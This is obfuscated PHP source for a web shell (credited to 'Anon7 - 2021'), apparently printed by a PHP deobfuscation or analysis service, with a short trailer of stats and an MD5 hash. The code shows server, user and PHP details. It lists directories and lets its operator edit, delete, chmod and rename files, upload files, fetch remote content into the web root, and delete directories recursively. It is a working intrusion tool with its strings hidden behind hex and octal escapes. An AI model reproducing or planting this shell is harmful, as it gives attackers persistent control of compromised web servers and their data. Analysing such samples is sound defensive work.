htmlspecialchars(file_get_contents($_POST["\x70\141\x74\x68"])) . "\x3c\x2f\164\145\170\x74\x61\162\145\x61\76\74\x62\x72\x3e\12\x9\x3c\151\x6e\160\165\164\40\x74\x79\160\x65\75\42\150\151\x64\x64\x65\156\x22\x20\x6e\x61\x6d\145\75\42\x70\141\x74\150\x22\40\x76\x61\x6c\x75\x65\x3d\x22" . $_POST["\160\141\x74\150"] . "\42\76\xa\x9\x3c\151\x6e\160\x75\x74\x20\x74\x79\x70\145\75\x22\x68\x69\x64\x64\x65\156\42\40\156\141\x6d\x65\75\42\160\151\x6c\x69\150\x22\x20\x76\141\x6c\x75\145\75\x22\145\144\x69\x74\x22\76\12\x9\x3c\x69\156\x70\165\x74\40\x74\x79\x70\145\75\x22\x73\165\x62\x6d\151\x74\x22\x20\166\x61\154\x75\145\75\42\105\x64\151\164\x20\x46\x69\x6c\145\42\x20\x6e\141\x6d\145\x3d\x22\x67\141\163\145\144\x69\x74\x22\x20\x2f\76\12\x9\x3c\x2f\146\x6f\x72\x6d\x3e\x3c\142\x72\x3e"; } goto N94bO; Wh8L6: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}\x2f{$file}")) { continue; } $size = filesize("{$lokasi}\57{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\x20\x4d\102"; } else { $size = $size . "\x20\x4b\102"; } echo "\74\x74\x72\x3e\xa\74\x74\144\x3e\x3c\141\x20\x68\x72\x65\x66\75\x22\x3f\x66\151\154\145\x6c\x6f\x63\x3d{$lokasi}\57{$file}\46\x70\141\x74\x68\x3d{$lokasi}\42\x3e{$file}\74\57\141\x3e\x3c\x2f\x74\x64\76\xa\74\164\144\x3e\74\x63\x65\x6e\x74\145\x72\x3e" . $size . "\x3c\x2f\x63\145\x6e\164\x65\162\76\74\x2f\164\144\76\12\x3c\164\x64\76\74\x63\145\156\x74\x65\x72\76"; if (is_writable("{$lokasi}\x2f{$file}")) { echo "\74\x66\x6f\156\164\x20\143\x6f\154\157\x72\x3d\x22\147\162\145\x65\156\42\76"; } elseif (!is_readable("{$lokasi}\x2f{$file}")) { echo "\74\146\x6f\156\x74\x20\x63\157\154\157\162\x3d\x22\162\145\144\42\76"; } echo statusnya("{$lokasi}\x2f{$file}"); if (is_writable("{$lokasi}\57{$file}") || !is_readable("{$lokasi}\x2f{$file}")) { echo "\x3c\x2f\x66\x6f\x6e\164\76"; } echo "\74\x2f\143\145\156\164\x65\x72\76\74\57\164\x64\76\x3c\x74\144\76\x3c\x63\145\x6e\164\x65\162\x3e\xa\74\x66\x6f\x72\155\40\x6d\145\x74\x68\157\x64\75\42\x70\157\x73\x74\42\40\x61\x63\164\x69\x6f\x6e\x3d\x22\x3f\160\x69\x6c\151\150\x61\x6e\x26\160\x61\164\150\x3d{$lokasi}\x22\76\xa\x3c\163\x65\154\145\143\x74\x20\x6e\141\x6d\x65\x3d\42\x70\151\154\151\150\42\76\xa\x3c\157\x70\164\151\x6f\x6e\x20\x76\x61\154\165\x65\x3d\42\x22\x3e\74\x2f\x6f\x70\164\x69\x6f\x6e\x3e\xa\74\157\x70\164\x69\157\156\x20\166\141\154\165\x65\75\x22\150\x61\160\x75\163\x22\76\104\x65\154\145\x74\145\x3c\57\157\160\x74\151\157\156\76\12\x3c\x6f\160\x74\x69\x6f\156\x20\x76\141\x6c\x75\145\75\x22\x75\x62\x61\x68\155\x6f\144\42\76\x43\x68\x6d\60\144\74\x2f\x6f\x70\x74\x69\x6f\x6e\76\xa\x3c\x6f\160\x74\x69\157\156\40\166\x61\x6c\x75\x65\x3d\42\147\x61\x6e\164\151\156\x61\155\141\x22\x3e\x52\145\156\141\155\145\74\57\157\160\x74\151\157\x6e\76\xa\74\x6f\160\164\151\x6f\x6e\40\166\x61\154\x75\x65\75\x22\145\144\151\x74\x22\x3e\105\144\x69\164\x3c\57\x6f\160\164\151\157\156\76\xa\x3c\57\163\x65\x6c\145\143\x74\76\xa\74\x69\156\x70\x75\x74\x20\164\x79\x70\x65\75\x22\x68\151\144\x64\145\x6e\x22\40\156\141\x6d\x65\x3d\x22\x74\171\160\145\42\x20\166\x61\154\165\x65\x3d\42\146\x69\x6c\x65\42\x3e\12\x3c\x69\x6e\160\165\164\x20\164\x79\x70\145\75\42\150\x69\144\144\x65\x6e\x22\40\156\141\x6d\145\75\x22\x6e\x61\x6d\x65\42\40\x76\141\154\165\145\x3d\x22{$file}\x22\76\12\74\x69\x6e\x70\x75\164\x20\164\x79\x70\145\75\42\x68\x69\x64\x64\145\156\42\x20\x6e\141\x6d\145\75\x22\160\141\164\x68\42\40\x76\141\x6c\165\145\x3d\42{$lokasi}\57{$file}\42\76\12\x3c\151\x6e\x70\x75\x74\40\x74\x79\160\145\75\x22\163\165\x62\x6d\151\x74\x22\40\x63\154\x61\x73\163\75\42\147\x61\x73\42\40\166\x61\154\165\145\x3d\x22\76\42\x20\x2f\x3e\xa\x3c\57\146\157\x72\155\x3e\x3c\57\143\145\156\164\x65\x72\x3e\74\x2f\x74\144\76\xa\74\x2f\x74\x72\76"; } goto cb8rQ; S3KF0: $disfunc = @ini_get("\144\151\163\x61\x62\154\145\x5f\x66\x75\156\x63\x74\151\x6f\x6e\163"); goto WSxDh; FZxw8: function cekdir() { if (isset($_GET["\160\141\x74\x68"])) { $lokasi = $_GET["\x70\x61\x74\150"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "\74\x66\x6f\156\x74\x20\x63\x6f\x6c\157\162\75\x27\x67\x72\x65\145\156\x27\76\127\162\x69\x74\x65\141\x62\154\x65\x3c\57\146\x6f\156\164\76"; } else { return "\74\146\x6f\156\x74\x20\x63\157\154\x6f\162\x3d\47\x72\x65\x64\47\76\x57\162\151\164\x65\x61\142\x6c\145\74\x2f\x66\x6f\x6e\x74\x3e"; } } goto Dt4vE; zXKIr: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto k_Kg8; IE3kQ: echo "\x55\x73\x65\162\x20\x3a\40\x3c\146\x6f\156\x74\x20\143\x6f\154\x6f\162\75\47\x67\157\154\144\47\76" . @get_current_user() . "\46\x6e\x62\x73\x70\x3b\x3c\57\146\157\156\x74\76\50\40\x3c\146\x6f\156\164\40\143\157\154\157\x72\75\x27\147\157\154\x64\47\76" . @getmyuid() . "\x3c\57\146\x6f\x6e\x74\76\x29\74\x62\x72\76"; goto oqfta; PjQtC: echo "\123\171\163\x74\x65\x6d\x20\x3a\x20\x3c\146\x6f\x6e\164\x20\143\157\154\157\162\x3d\x27\147\157\x6c\144\x27\x3e" . php_uname() . "\74\57\146\157\156\x74\76\x3c\x62\x72\x3e"; goto IE3kQ; OZv5P: ?>
<!doctypehtml><html><head><title>.</title></head><body bgcolor="#1f1f1f"text="#ffffff"><link href=""rel="stylesheet"type="text/css"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);body{font-family:Dosis,cursive;text-shadow:0 0 1px #757575}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#25383c}#content .first:hover{background-color:#25383c text-shadow:0px 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#fff;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee"size="5">KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY</font></center><table align="center"border="0"cellpadding="3"cellspacing="1"width="700"><tr><td><?php  goto HIAMg; Dt4vE: function cekroot() { if (is_writable($_SERVER["\x44\117\x43\125\x4d\x45\x4e\x54\137\122\x4f\x4f\124"])) { return "\74\146\157\x6e\x74\x20\x63\x6f\x6c\x6f\162\x3d\x27\x67\162\145\x65\x6e\47\76\127\162\151\164\145\x61\142\154\145\x3c\57\146\157\x6e\x74\x3e"; } else { return "\74\x66\157\156\x74\x20\x63\157\x6c\x6f\162\75\47\162\x65\144\x27\x3e\127\x72\x69\x74\145\x61\142\x6c\145\x3c\x2f\x66\x6f\156\164\x3e"; } } goto W5VOk; KZyJ5: echo "\x44\x69\x73\x61\x62\x6c\x65\x20\106\165\x6e\143\164\x69\157\156\40\72\x20" . $disf . "\x3c\x2f\146\157\156\164\x3e\x3c\x62\x72\x3e"; goto xfypo; cb8rQ: echo "\74\57\x74\x72\x3e\x3c\57\164\144\x3e\x3c\x2f\x74\x61\142\154\145\x3e\x3c\x2f\164\141\142\154\145\x3e"; goto HIzBX; N94bO: echo "\74\x64\x69\166\x20\151\144\75\x22\143\157\x6e\x74\145\156\x74\42\x3e\74\164\x61\x62\x6c\x65\40\x77\151\144\x74\150\75\x22\x37\x30\60\42\x20\142\157\x72\144\x65\x72\75\x22\60\x22\40\143\x65\x6c\x6c\160\141\x64\144\x69\156\147\75\42\x33\42\40\143\x65\x6c\x6c\163\x70\141\143\x69\x6e\x67\x3d\42\61\x22\x20\141\154\x69\x67\x6e\x3d\42\x63\145\x6e\x74\x65\x72\x22\x3e\12\x3c\164\162\x20\x63\x6c\141\x73\x73\75\x22\x66\x69\162\x73\x74\x22\76\xa\74\164\144\x3e\x3c\143\145\x6e\x74\145\x72\x3e\116\x61\155\145\74\57\x63\x65\x6e\164\x65\162\76\x3c\x2f\x74\x64\x3e\12\x3c\x74\x64\x3e\74\x63\x65\x6e\164\145\x72\x3e\123\x69\x7a\145\74\x2f\x63\145\156\x74\x65\162\x3e\74\x2f\164\x64\x3e\xa\x3c\164\x64\76\x3c\143\145\x6e\164\145\162\76\x50\145\x72\x6d\151\x73\x73\x69\157\156\163\x3c\57\x63\x65\x6e\x74\x65\x72\x3e\x3c\x2f\164\144\x3e\12\x3c\164\x64\x3e\74\143\145\x6e\x74\145\162\x3e\x4f\160\164\151\x6f\156\x73\x3c\x2f\143\x65\156\x74\145\x72\76\x3c\x2f\164\144\x3e\12\74\x2f\164\x72\x3e"; goto sHX4R; W5VOk: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "\x2e" || $item === "\56\x2e") { continue; } $path = $dir . "\57" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto NGC_f; NGC_f: function green($text) { echo "\74\143\x65\156\164\x65\x72\76\x3c\146\157\156\164\40\143\x6f\154\x6f\162\x3d\47\x67\x72\x65\x65\156\x27\76" . $text . "\74\x2f\143\x65\156\164\x65\x72\76\x3c\57\146\157\x6e\164\x3e"; } goto XGC1J; LNMA0: function author() { echo "\74\x63\x65\156\x74\145\x72\76\x3c\142\x72\76\x41\x6e\157\156\x37\x20\x2d\x20\x32\60\62\x31\x3c\57\143\145\x6e\x74\145\162\76"; die; } goto FZxw8; iUm5J: if (isset($_POST["\x75\160\x77\153\x77\x6b"])) { if (isset($_POST["\x62\x65\162\x6b\x61\163\156\x79\141"])) { if ($_POST["\x64\x69\162\156\171\x61"] == "\x32") { $lokasi = $_SERVER["\104\117\x43\x55\115\105\x4e\124\137\x52\x4f\117\124"]; } $data = @file_put_contents($lokasi . "\57" . $_FILES["\x62\145\x72\x6b\x61\163"]["\156\141\x6d\x65"], @file_get_contents($_FILES["\142\145\x72\x6b\x61\x73"]["\x74\155\x70\137\x6e\141\x6d\x65"])); if (file_exists($lokasi . "\57" . $_FILES["\142\x65\x72\153\x61\163"]["\156\x61\x6d\145"])) { echo "\106\151\154\145\x20\x55\x70\154\x6f\x61\144\145\144\x20\41\x20\x26\x6e\142\x73\160\73\x3c\146\157\x6e\164\x20\143\x6f\154\157\162\75\x27\x67\157\154\x64\x27\76\x3c\x69\x3e" . $lokasi . "\x2f" . $_FILES["\x62\x65\162\153\141\163"]["\x6e\141\x6d\145"] . "\74\57\151\x3e\x3c\57\146\x6f\156\x74\x3e\x3c\x62\162\x3e\x3c\142\162\x3e"; } else { echo "\x3c\146\157\x6e\x74\x20\x63\157\x6c\157\162\x3d\x27\162\145\x64\x27\x3e\x46\141\x69\x6c\145\x64\x20\164\x6f\40\125\x70\x6c\157\x61\144\x20\41\74\x62\162\76\x3c\x62\x72\x3e"; } } elseif (isset($_POST["\154\151\x6e\153\156\x79\141"])) { if (empty($_POST["\x6e\141\155\x61\x6c\x69\156\x6b"])) { die("\106\151\x6c\x65\x6e\141\x6d\145\40\x63\141\x6e\156\x6f\164\x20\142\x65\x20\x65\155\x70\164\171\40\x21"); } if ($_POST["\x64\151\162\156\171\x61"] == "\62") { $lokasi = $_SERVER["\104\117\x43\x55\115\x45\x4e\124\137\122\x4f\x4f\124"]; } $data = @file_put_contents($lokasi . "\x2f" . $_POST["\x6e\141\x6d\141\x6c\151\156\x6b"], @file_get_contents($_POST["\144\141\162\x69\154\x69\x6e\x6b"])); if (file_exists($lokasi . "\57" . $_POST["\x6e\141\155\141\x6c\151\156\153"])) { echo "\x46\x69\154\x65\40\125\160\x6c\157\x61\x64\x65\x64\x20\x21\40\46\156\142\x73\x70\x3b\x3c\146\157\x6e\164\40\x63\x6f\154\157\162\x3d\47\x67\x6f\x6c\x64\x27\76\74\x69\x3e" . $lokasi . "\57" . $_POST["\156\x61\x6d\x61\x6c\x69\156\153"] . "\74\x2f\x69\76\x3c\x2f\x66\157\156\164\76\74\142\x72\76\x3c\142\x72\x3e"; } else { echo "\74\146\157\156\x74\x20\x63\157\154\x6f\145\75\x27\162\145\x64\x27\x3e\x46\x61\151\x6c\x65\x64\x20\164\x6f\40\x55\160\154\157\141\144\x20\x21\74\x62\x72\x3e\x3c\142\x72\76"; } } } goto IcnwN; HIzBX: author(); goto a6bi2; k_Kg8: if (isset($_GET["\160\141\x74\150"])) { $lokasi = $_GET["\x70\141\164\150"]; $lokdua = $_GET["\x70\141\x74\150"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto Xbd3k; Zr_w1: $lokasinya = @scandir($lokasi); goto elemu; gScDm: echo "\74\x2f\x74\x64\x3e\74\57\x74\x72\76\74\x74\x72\76\74\x74\144\76\74\x62\162\x3e"; goto iUm5J; WSxDh: if (empty($disfunc)) { $disf = "\74\x66\x6f\x6e\164\x20\143\x6f\x6c\157\162\x3d\47\x67\x6f\154\x64\47\x3e\x4e\117\x4e\105\74\x2f\146\157\x6e\164\76"; } else { $disf = "\74\146\x6f\x6e\164\40\x63\x6f\x6c\157\x72\75\47\162\145\144\x27\76" . $disfunc . "\x3c\57\146\x6f\156\x74\x3e"; } goto LNMA0; oqfta: echo "\x50\110\120\40\126\x65\162\x73\x69\x6f\x6e\40\72\x20\x3c\x66\157\156\x74\40\143\157\x6c\x6f\162\x3d\x27\147\157\154\x64\x27\76" . @phpversion() . "\x3c\57\146\157\156\x74\76\74\x62\x72\x3e"; goto KZyJ5; XGC1J: function red($text) { echo "\74\143\x65\156\x74\145\x72\x3e\x3c\x66\x6f\x6e\164\x20\143\x6f\154\x6f\162\x3d\47\162\145\144\x27\x3e" . $text . "\x3c\x2f\143\x65\156\164\x65\x72\76\74\x2f\146\157\x6e\x74\76"; } goto t3A6Q; uyexF: echo "\74\x74\x72\40\143\154\141\163\163\75\x22\x66\x69\x72\x73\164\x22\76\x3c\164\x64\76\74\57\164\x64\76\x3c\x74\x64\x3e\74\57\164\x64\76\74\x74\x64\x3e\74\57\x74\x64\76\x3c\x74\144\x3e\x3c\x2f\164\x64\76\x3c\x2f\x74\162\x3e"; goto Wh8L6; xfypo: echo "\x44\x69\162\145\x63\164\x6f\x72\x79\x20\x3a\x20\46\x6e\x62\163\x70\73"; goto zXKIr; t3A6Q: echo "\123\145\x72\166\x65\x72\x20\x3a\x20\74\x66\157\x6e\x74\40\143\157\154\x6f\x72\x3d\47\147\x6f\x6c\x64\47\x3e" . $_SERVER["\x53\105\x52\126\x45\122\137\x53\117\106\x54\127\101\122\x45"] . "\x3c\x2f\146\x6f\x6e\x74\x3e\x3c\x62\162\76"; goto PjQtC; LLZHQ: 

Function Calls

None

Variables

None

Stats

MD5 c5cbf918d2ddc89edff85595e4a0fd0b
Eval Count 0
Decode Time 48 ms